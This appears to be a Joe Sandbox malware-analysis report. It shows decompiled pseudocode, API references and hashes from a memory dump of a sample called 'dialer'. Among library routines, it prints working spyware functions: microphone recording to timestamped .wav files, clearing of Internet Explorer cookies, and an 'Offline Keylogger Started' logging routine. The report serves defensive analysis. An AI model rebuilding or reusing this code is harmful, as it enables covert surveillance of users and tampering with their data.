Part of subcall function 0043E61D: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F

_free.LIBCMT ref: 0043D2EC
_free.LIBCMT ref: 0043D303
_free.LIBCMT ref: 0043D322
_free.LIBCMT ref: 0043D33D
_free.LIBCMT ref: 0043D354

Strings

sE, xrefs: 0043D2C6

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: sE
API String ID: 3033488037-3868527542
Opcode ID: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
Instruction ID: af8df24ae55f722775fb3ee277683ae55e0fcf911b6e467c94d3c9977f85d582
Opcode Fuzzy Hash: 253d7788f3aba69a5ce80eaba656dcbd409c5dbd4ff776d2a2e3b7682aeb0034
Instruction Fuzzy Hash: FD51E371E002049FDB209F6AE842A6B77F4EF5C724F1416AEE809D7250E739ED01CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0044FB0A, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0044FB0A(signed int __edx, intOrPtr _a4, intOrPtr _a8, char _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E0044471C(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E0044471C(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t5 =  &_a12; // 0x44e4e7
					_t20 =  *_t5;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t13 =  &_v20; // 0x44e4e7
							_t21 = E0044471C(_t59,  *_t13, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(L00439E14()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t14 =  &_a12; // 0x44e4e7
							_t25 = E0044471C(_t59, _a8,  *_t14, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E004472C8(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(L00439E14())) = 0xd;
							_t30 = L00439E01();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E0043DFD9(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E0043C7E5(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = L00443E67(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = L00439E01();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(L00439E14())) = 0xd;
										}
										L23:
										_t38 = L00439E14();
										L0043EE85(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E0043C7E5(_t56, _t59, _v12);
							L0043EE85(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(L00439E14())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(L00439E14()));
			}

0x0044fb0a
0x0044fb14
0x0044fb17
0x0044fb1e
0x0044fb25
0x0044fb2a
0x0044fb2d
0x0044fb33
0x0044fb46
0x0044fb4d
0x0044fb50
0x0044fb52
0x0044fb55
0x00000000
0x00000000
0x0044fb5b
0x0044fb5b
0x0044fb5d
0x0044fb5d
0x0044fb60
0x0044fb62
0x0044fb65
0x0044fc43
0x0044fc43
0x0044fc45
0x0044fbfc
0x0044fc00
0x0044fc04
0x0044fc0e
0x0044fc11
0x0044fc92
0x0044fc92
0x0044fc94
0x00000000
0x0044fc94
0x0044fc13
0x0044fc18
0x00000000
0x0044fc18
0x0044fc47
0x0044fc4d
0x0044fc4e
0x0044fc55
0x0044fc5c
0x0044fc5f
0x0044fc62
0x00000000
0x00000000
0x0044fc6c
0x0044fc72
0x0044fc74
0x00000000
0x00000000
0x0044fc7b
0x0044fc81
0x0044fc8e
0x00000000
0x0044fc8e
0x0044fc49
0x0044fc4b
0x00000000
0x00000000
0x00000000
0x0044fc4b
0x0044fb6b
0x0044fb75
0x0044fb81
0x0044fb84
0x0044fb85
0x0044fb87
0x0044fba5
0x0044fba8
0x0044fbab
0x0044fbac
0x0044fbac
0x0044fbae
0x0044fbc1
0x0044fbc1
0x0044fbc3
0x0044fbc6
0x0044fbcb
0x0044fbce
0x0044fbd1
0x0044fc1c
0x0044fc21
0x0044fc24
0x0044fc2b
0x0044fc2b
0x0044fc31
0x0044fc31
0x0044fc39
0x0044fc3f
0x00000000
0x0044fc3f
0x0044fbd3
0x0044fbd4
0x0044fbd6
0x0044fbd9
0x0044fbdb
0x0044fbde
0x0044fbe0
0x0044fbba
0x0044fbba
0x00000000
0x0044fbba
0x0044fbe2
0x00000000
0x00000000
0x00000000
0x0044fbe2
0x0044fbb0
0x00000000
0x00000000
0x0044fbb2
0x0044fbb8
0x00000000
0x00000000
0x00000000
0x0044fbe4
0x0044fbe4
0x0044fbe4
0x0044fbec
0x0044fbf2
0x0044fbf7
0x0044fbfa
0x0044fbfa
0x00000000
0x0044fbfa
0x0044fb8e
0x00000000
0x0044fb8e
0x0044fb6d
0x0044fb6f
0x00000000
0x00000000
0x00000000
0x0044fb6f
0x0044fb35
0x00000000

APIs

_free.LIBCMT ref: 0044FC39

Strings

D, xrefs: 0044FC00
D, xrefs: 0044FB5D, 0044FC4E

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free
String ID: D$D
API String ID: 269201875-4097043698
Opcode ID: 1014a0f0c51015df7bb834f668637bca85c7420ac95c9077ef18819d6b34e280
Instruction ID: 401ee54e1f801b351f834f6e0cecad5f65061600a9ebeb7cde9f8dc6c8afd165
Opcode Fuzzy Hash: 1014a0f0c51015df7bb834f668637bca85c7420ac95c9077ef18819d6b34e280
Instruction Fuzzy Hash: 0F412F319001446BFB21ABBACC86A6F3A64EF46374F14013FF814D63D1E77C9D4546AA

Uniqueness

Uniqueness Score: -1.00%

Function 00401CCF, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401CCF(void* __ebx, void* __edi, intOrPtr _a8) {
				char _v84;
				char _v112;
				void* _v116;
				char _v136;
				void* _v140;
				char _v160;
				void* _v164;
				char _v184;
				void* _v188;
				char _v204;
				char _v208;
				void* _v212;
				char _v228;
				char _v232;
				char _v236;
				void* __esi;
				void* _t29;
				intOrPtr _t43;
				void* _t75;

				_t47 = __ebx;
				_push(_t75);
				L00401F4D(__ebx,  &_v228);
				_t82 = _a8 - 0x3c0;
				if(_a8 == 0x3c0) {
					E004016D0();
					L00434FC9( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016C8());
					E00402064(__ebx,  &_v204,  &_v84);
					_t29 = E00416C32( &_v112,  &_v208);
					L00401EDA( &_v232, _t31, _t75, E00403086(_t47,  &_v184, E00403010( &_v160, L00402FDA(__ebx,  &_v136, 0x46c0e0, 0x5c), _t29), __edi, _t82, L".wav"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
					L00401ED0();
					L00401FA7();
					E00401A44(L00401ECB( &_v236), 0x46ba78);
					waveInUnprepareHeader( *0x46bab0, 0x46ba78, 0x20);
					0x46ba78->lpData = L00401F75(0x46c0f8);
					_t43 =  *0x46bab4; // 0x0
					 *0x46ba7c = _t43;
					 *0x46ba80 = 0;
					 *0x46ba84 = 0;
					 *0x46ba88 = 0;
					 *0x46ba8c = 0;
					waveInPrepareHeader( *0x46bab0, 0x46ba78, 0x20);
					waveInAddBuffer( *0x46bab0, 0x46ba78, 0x20);
				}
				return L00401ED0();
			}

0x00401ccf
0x00401cdf
0x00401ce0
0x00401ce5
0x00401cec
0x00401cf6
0x00401d14
0x00401d28
0x00401d3d
0x00401d71
0x00401d7a
0x00401d83
0x00401d8c
0x00401d98
0x00401da1
0x00401db8
0x00401dc6
0x00401dd8
0x00401ddd
0x00401de9
0x00401df0
0x00401df5
0x00401dfa
0x00401dff
0x00401e04
0x00401e13
0x00401e13
0x00401e26

APIs

_strftime.LIBCMT ref: 00401D14

Part of subcall function 00401A44: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AAC

waveInUnprepareHeader.WINMM(0046BA78,00000020,00000000,?), ref: 00401DC6
waveInPrepareHeader.WINMM(0046BA78,00000020), ref: 00401E04
waveInAddBuffer.WINMM(0046BA78,00000020), ref: 00401E13

Strings

%Y-%m-%d %H.%M, xrefs: 00401D05
.wav, xrefs: 00401D2D

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: 13142f69c5b27f610329f4f23c20a2525df786009a26800cf74f8bd786eea427
Instruction ID: 5582f1af7622f8a37d22e1a64eb2035981458472c0f30470e3437ee93cc7ba7d
Opcode Fuzzy Hash: 13142f69c5b27f610329f4f23c20a2525df786009a26800cf74f8bd786eea427
Instruction Fuzzy Hash: 95317E315143009BC314EF62DC46A9E77A8EB54348F40483EF995A21F1FF789A48CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7A6, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A7A6(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;

				_t42 =  &_v28;
				E004020B5(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E004102D2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t62 = _t61 + 0xc;
				L00401FB1( &_v28, 0x80000001, _t59, _t17);
				L00401FA7();
				_t58 = 0x45f6ac;
				_t20 = E00405A22(0x45f6ac);
				_t66 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(L00401F75( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402064(0,  &_v52,  &_v340);
						_t58 =  &_v52;
						_t34 = E004170AC(L00401ECB(E00416C32( &_v76,  &_v52)));
						L00401ED0();
						_t55 =  &_v52;
						L00401FA7();
						__eflags = _t34;
						if(__eflags == 0) {
							_push(_t55);
							_push(_t55);
							__eflags = E0040AAB0();
							if(__eflags != 0) {
								_t41 = 1;
								E00402064(1, _t62 - 0x18, "\n[IE cookies cleared!]");
								E0040AA8C(1,  &_v52, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t62 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t62 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402064(_t41, _t48);
					E0040AA8C(_t41, _t58, _t66);
					_t41 = 1;
					L8:
				}
				L00401FA7();
				return _t41;
			}

APIs

Part of subcall function 004102D2: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 004102F4
Part of subcall function 004102D2: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00410313
Part of subcall function 004102D2: RegCloseKey.ADVAPI32(?), ref: 0041031C

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040A828
PathFileExistsA.SHLWAPI(?), ref: 0040A835

Strings

[IE cookies cleared!], xrefs: 0040A882, 0040A89E
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0040A7BF
[IE cookies not found], xrefs: 0040A7FD
Cookies, xrefs: 0040A7BA

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: d54a227835b152a1126f4ffcf77cef355c2697ac5d810812eca284e3e5a89111
Instruction ID: 86840d2655219e895a2e3310a5aa52ddb93a2453b48acae1739db4ed104c70da
Opcode Fuzzy Hash: d54a227835b152a1126f4ffcf77cef355c2697ac5d810812eca284e3e5a89111
Instruction Fuzzy Hash: 8621BF31A102055ACB18B7B1CC5BDEE77689F15304F80013FB901B71D2EA7C9A5ACA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0044FA43, Relevance: 10.6, APIs: 7, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0044FA43(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E00440D5D(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E0043E61D(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									L00439DDE(GetLastError());
								}
							}
							L0043EE85(_t40);
							_t14 = _t35;
						} else {
							L00439DDE(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(L00439E14())) = 0x16;
						E0043626D();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(L00439E14())) = 0x16;
				E0043626D();
				return 0;
			}

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa8b7380e9e2fa54c836bb8ecbf4476d0dbd25c1ba35cd8a11bb044368231e8e
Instruction ID: a1c109c1609699d4209c0352da68e76d0abf83c28ba15cddbfee87ef62dca71a
Opcode Fuzzy Hash: aa8b7380e9e2fa54c836bb8ecbf4476d0dbd25c1ba35cd8a11bb044368231e8e
Instruction Fuzzy Hash: DE112472504215BFEB216FB28C0596B3A6CDF86761F11416AB829D7281DA78CD05C278

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB85, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040EB85(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				void* __esi;
				intOrPtr _t40;
				void* _t48;
				intOrPtr* _t51;

				E0042F975( &_v12, 0);
				_t48 =  *0x46db6c;
				_v8 = _t48;
				_t51 = L0040BDA6(_a4, E0040BCCF(0x46b130));
				if(_t51 != 0) {
					L5:
					E0042F9CD( &_v12);
					return _t51;
				} else {
					if(_t48 == 0) {
						__eflags = L0040BED8(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							E0040BB95( &_v24);
							E0043196A( &_v24, 0x46863c);
							asm("int3");
							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
							__eflags =  *0x46db60 -  *((intOrPtr*)(_t40 + 4));
							if( *0x46db60 >  *((intOrPtr*)(_t40 + 4))) {
								_push(_t51);
								E0042EA6C(0x46db60);
								__eflags =  *0x46db60 - 0xffffffff;
								if( *0x46db60 == 0xffffffff) {
									L0040EF3C();
									L0042EDF6(__eflags, 0x4520d7);
									E0042EA2D(0x46db60, 0x46db60);
								}
							}
							return 0x46db64;
						} else {
							_t51 = _v8;
							 *0x46db6c = _t51;
							 *((intOrPtr*)( *_t51 + 4))();
							E0042FB86(__eflags, _t51);
							goto L5;
						}
					} else {
						_t51 = _t48;
						goto L5;
					}
				}
			}

0x0040eb92
0x0040eb97
0x0040eba2
0x0040ebb3
0x0040ebb7
0x0040ebeb
0x0040ebee
0x0040ebfa
0x0040ebb9
0x0040ebbb
0x0040ebcf
0x0040ebd2
0x0040ebfe
0x0040ec0c
0x0040ec11
0x0040ec18
0x0040ec1f
0x0040ec25
0x0040ec27
0x0040ec2e
0x0040ec33
0x0040ec3b
0x0040ec3d
0x0040ec47
0x0040ec4d
0x0040ec53
0x0040ec54
0x0040ec5a
0x0040ebd4
0x0040ebd4
0x0040ebd9
0x0040ebe1
0x0040ebe5
0x00000000
0x0040ebea
0x0040ebbd
0x0040ebbd
0x00000000
0x0040ebbd
0x0040ebbb

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040EB92
int.LIBCPMT ref: 0040EBA5

Part of subcall function 0040BCCF: std::_Lockit::_Lockit.LIBCPMT ref: 0040BCE0
Part of subcall function 0040BCCF: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BCFA

std::locale::_Getfacet.LIBCPMT ref: 0040EBAE
std::_Facet_Register.LIBCPMT ref: 0040EBE5
std::_Lockit::~_Lockit.LIBCPMT ref: 0040EBEE
__CxxThrowException@8.LIBVCRUNTIME ref: 0040EC0C
__Init_thread_footer.LIBCMT ref: 0040EC4D

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
String ID:
API String ID: 2409581025-0
Opcode ID: e95ac851cc965dd172c589aa3f54ebaf9829d91c58243d425117ca94bd3fc57c
Instruction ID: 2015a610ee6efac616509c358a8e7b405a7e5c964e0770d3a65de483927ca0dd
Opcode Fuzzy Hash: e95ac851cc965dd172c589aa3f54ebaf9829d91c58243d425117ca94bd3fc57c
Instruction Fuzzy Hash: 90210032F00224ABCA10EB6AD84199E7368AF04724B60017BF401B72D2EB78AD4187DE

Uniqueness

Uniqueness Score: -1.00%

Function 00409636, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74
timeCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00409636(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				WCHAR* _t33;
				void* _t65;
				void* _t67;
				void* _t70;

				_t70 = __eflags;
				_t42 = __ebx;
				_t67 = __ecx;
				GetLocalTime( &_v20);
				L00401EDA( &_a4, _t26, _t67, E00403086(__ebx,  &_v44, L00409E6B( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
				L00401ED0();
				L00401ED0();
				_push(0x64 + E00402469() * 2);
				_t33 = L00438E06( &_a4);
				_t66 = _t33;
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				_push(_v20.wYear & 0x0000ffff);
				wsprintfW(_t33, L00401ECB( &_a4));
				if( *((char*)(_t67 + 0x49)) != 0) {
					_t19 = _t67 + 4; // 0x46c354
					E0040766E(__ebx, _t19, _t66, _t66);
				}
				if( *((char*)(_t67 + 0x4a)) != 0) {
					_t21 = _t67 + 0x1c; // 0x46c36c
					E0040766E(_t42, _t21, _t66, _t66);
					_t22 = _t67 + 0x3c; // 0x0
					SetEvent( *_t22);
				}
				L00438E01(_t66);
				return L00401ED0();
			}

0x00409636
0x00409636
0x00409641
0x00409644
0x00409670
0x00409678
0x00409680
0x00409694
0x00409695
0x0040969f
0x004096a5
0x004096aa
0x004096af
0x004096b4
0x004096b9
0x004096ba
0x004096c5
0x004096d2
0x004096d5
0x004096d8
0x004096d8
0x004096e1
0x004096e4
0x004096e7
0x004096ec
0x004096ef
0x004096ef
0x004096f6
0x00409709

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644

Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B

wsprintfW.USER32 ref: 004096C5
SetEvent.KERNEL32(00000000,00000000), ref: 004096EF

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040964D
Offline Keylogger Started, xrefs: 0040963D
], xrefs: 00409652

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: EventLocalTimechar_traitswsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 3003339404-248792730
Opcode ID: f0624f23261da35f477d53f9b92bf0e30819aa203d6935bf6dfc9d140d79229c
Instruction ID: 6949cdf2dc2b1dc4c02aecbde94e80b0bd9bd0d89d133fd011f78c3c8f91f7cb
Opcode Fuzzy Hash: f0624f23261da35f477d53f9b92bf0e30819aa203d6935bf6dfc9d140d79229c
Instruction Fuzzy Hash: E921B376400118AAC728EB66DC558FF77B8AF08345F00013FF842621E2EF79AA45C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00416871, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71
sleeplibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00416871(void* __edx) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t40;
				intOrPtr* _t44;

				_t40 = __edx;
				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t44( &_v52,  &_v28,  &_v20);
				Sleep(0x3e8);
				 *_t44( &_v44,  &_v36,  &_v12);
				_t25 = E00416926( &_v12);
				_t26 = E00416926( &_v20);
				asm("sbb ebx, edx");
				_t27 = E00416926( &_v28);
				asm("sbb ebx, edx");
				_v8 = _t25 - _t26 - _t27 + E00416926( &_v36);
				asm("adc ebx, edx");
				_t29 = E00416926( &_v44);
				asm("sbb esi, edx");
				_t30 = E00416926( &_v52);
				asm("adc esi, edx");
				return E004500F0(E004500B0(_t25 - _t26 - _t27 + E00416926( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
			}

0x00416871
0x00416891
0x0041689f
0x004168a6
0x004168b8
0x004168bd
0x004168c9
0x004168d3
0x004168d5
0x004168df
0x004168eb
0x004168ee
0x004168f0
0x004168fe
0x00416900
0x0041690b
0x00416925

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,00412F5F), ref: 00416884
GetProcAddress.KERNEL32(00000000), ref: 0041688B
Sleep.KERNEL32(000003E8,?,0046BACC,?,?,?,?,?,?,?,?,?,?,?,00412F5F,00000095), ref: 004168A6
__aulldiv.LIBCMT ref: 0041691A

Strings

GetSystemTimes, xrefs: 0041687A
kernel32.dll, xrefs: 0041687F

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcSleep__aulldiv
String ID: GetSystemTimes$kernel32.dll
API String ID: 482274533-1354958348
Opcode ID: 447e08370cb846e82d1e918c8c685330979de9bb69d58332e4160e1d868d99db
Instruction ID: 591b4d1d7c4e76c74ddada12000fb562f1f068179a7c55beccbbde0fa6e2f12d
Opcode Fuzzy Hash: 447e08370cb846e82d1e918c8c685330979de9bb69d58332e4160e1d868d99db
Instruction Fuzzy Hash: BF11A5B7D003286BC710EBF5DD85DEF7B7CAB44750F05062AF905A3545ED349A0486E4

Uniqueness

Uniqueness Score: -1.00%

Function 004349C5, Relevance: 10.6, APIs: 7, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E004349C5(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x46a090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E004314E8(__eflags,  *0x46a090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00431522(__eflags,  *0x46a090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E0043DFD9(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00431522(__eflags,  *0x46a090, 0);
								} else {
									__eflags = E00431522(__eflags,  *0x46a090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L0043EE85(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(?,?,004349BC,00431B02), ref: 004349D3
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004349E1
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004349FA
SetLastError.KERNEL32(00000000,?,004349BC,00431B02), ref: 00434A4C

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
